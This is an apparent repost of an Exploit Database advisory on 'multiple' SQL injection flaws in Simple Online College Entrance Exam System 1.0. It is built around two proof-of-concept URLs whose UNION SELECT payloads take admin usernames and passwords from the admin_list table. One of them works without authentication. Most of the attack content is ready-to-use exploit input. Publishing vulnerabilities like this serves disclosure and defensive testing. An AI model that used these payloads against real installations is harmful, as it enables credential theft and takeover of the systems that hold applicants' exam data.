Simple Online College Entrance Exam System 1.0 – ‘Multiple’ SQL injection

• Exploit Database
• 11 阅读

• 作者： Amine ismail
  日期： 2021-10-08
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50398/

• # Exploit Title: Simple Online College Entrance Exam System 1.0 - 'Multiple' SQL injection
  # Date: 07.10.2021
  # Exploit Author: Amine ismail @aminei_
  # Vendor Homepage: https://www.sourcecodester.com/php/14976/simple-online-college-entrance-exam-system-php-and-sqlite-free-source-code.html
  # Software Link: https://www.sourcecodester.com/download-code?nid=14976&title=Simple+Online+College+Entrance+Exam+System+in+PHP+and+SQLite+Free+Source+Code
  # Version: 1.0
  # Tested on: Windows 10, Kali Linux
  # Multiple SQL injections
  
  The following PoCs will leak the admin username and password:
  
  Unauthenticated:
  http://127.0.0.1/entrance_exam/take_exam.php?id=%27+UNION+SELECT+1,username||%27;%27||password,3,4,5,6,7+FROM+admin_list;
  
  Admin:
  http://127.0.0.1/entrance_exam/admin/view_enrollee.php?id=1'+UNION+SELECT+1,2,3,4,5,6,password,username,9,10,11,12,13,14,15+FROM+admin_list;